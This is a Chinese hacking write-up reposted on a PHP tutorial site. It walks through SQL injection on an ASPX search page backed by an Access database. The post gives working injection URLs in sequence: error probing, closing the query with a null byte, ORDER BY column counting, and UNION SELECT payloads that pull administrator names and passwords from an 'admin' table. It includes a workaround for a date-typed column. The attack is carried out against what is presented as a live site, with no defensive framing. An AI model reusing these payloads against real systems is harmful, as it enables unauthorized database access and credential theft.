网站地图    收藏   

主页 > 后端 > 网站安全 >

有点不一样的access注入 - 网站安全 - 自学php

来源:自学PHP网    时间:2015-04-17 14:46 作者: 阅读:

[导读] 和平常的 access 注入有点不一样的注入Byay 暗影死黑客kh 丢来一个注入点,说不能注入,然后我看了下,发现本次与以往的注入确实 不一样,之前没遇到过这种情况。下面来说说我的注入...

和平常的 access 注入有点不一样的注入
By ay 暗影

死黑客kh 丢来一个注入点,说不能注入,然后我看了下,发现本次与以往的注入确实 不一样,之前没遇到过这种情况。
下面来说说我的注入过程。 一个 aspx 站:
http://www.2cto.com /searchResult.aspx?paperName=&bdate=&edate=&news=1
输入一个单引号,报错了,哟西。

 \

由于惯性思维,之前的 aspx 站的注入点都是 MSSQL,然后本次注入点想当然的也以为 是 MSSQL,于是:
http://www.2cto.com /searchResult.aspx?paperName=&bdate=&edate=&news=1' and
1=(select name from sysobjects where xtype=char(85)) and '%'='
发现报错,奇怪了,怎么会错误呢?换语句测试
http://www.2cto.com /searchResult.aspx?paperName=&bdate=&edate=&news=1' and exists(select name from sysobjects where xtype=char(85)) and '%'='
 

\


我草,居然提示是 Jet 的,原来是 access 的数据库,法克,我说类…..和 kh 说了下,原 来他本来就说是 access 的,只是我没看到…..囧
之后就是想当然的,准备抓包,放到 ADV 里跑了,然后  刚开启抓包工具的时候,突然 想到了之前的单引号错误提示….
 
 \

他的提示是 and (atitle like '%1'%' or acontent like '%1'%')')  在这里,并不是以 order by  结尾的
哦,然后我果断的放弃使用 ADV 注入辅助工具,输入 http://www.2cto.com /searchResult.aspx?paperName=&bdate=&edate=&news=1')%00,嘿嘿,哟 西,没有报错,接下来就顺利了,直接 order by 了
http://www.2cto.com /searchResult.aspx?paperName=&bdate=&edate=&news=1') order by
7%00
到这里都很顺利,最后就是 union 了,然后问题出现了,
http://www.2cto.com /searchResult.aspx?paperName=&bdate=&edate=&news=1')%20union%20s elect%201,2,3,4,5,6,7%20from%20admin%20%00

\
 
我插,这是什么情况,字段不对?,重新 order by 了下,对的呀,是 7 个字段,然后仔细一 看,貌似是数据类型不同,是时间类型的数据。
然后输入
http://www.2cto.com /searchResult.aspx?paperName=&bdate=&edate=&news=1')%20union%20s elect%20null,null,null, null, null, null,null%20from%20admin%20%00
我插,还是不行,奇怪了,怎么会不行呢,明明都  null  了撒,然后百度了下,靠,原来是
access 里没有 null 这种数据类型我日他大爷的…
继续百度…把”string was not …..”这段文字直接输入百度里搜索终于有了眉目
http://www.2cto.com /searchResult.aspx?paperName=&bdate=&edate=&news=1')%20union%20s elect%201,name,pwd,4,5,6,'5/28/2008%2012:23:17%20PM'%20from%20admin%20%00
成功查询出管理员密码
 

 \


然后我又看了下 access 的数据类型,然后发现可以用更简单的方法
http://www.2cto.com /searchResult.aspx?paperName=&bdate=&edate=&news=1')%20union%20s elect%201,name,pwd,4,5,6,date()%20from%20admin%20%00
更简单

自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习

京ICP备14009008号-1@版权所有www.zixuephp.com

网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com

添加评论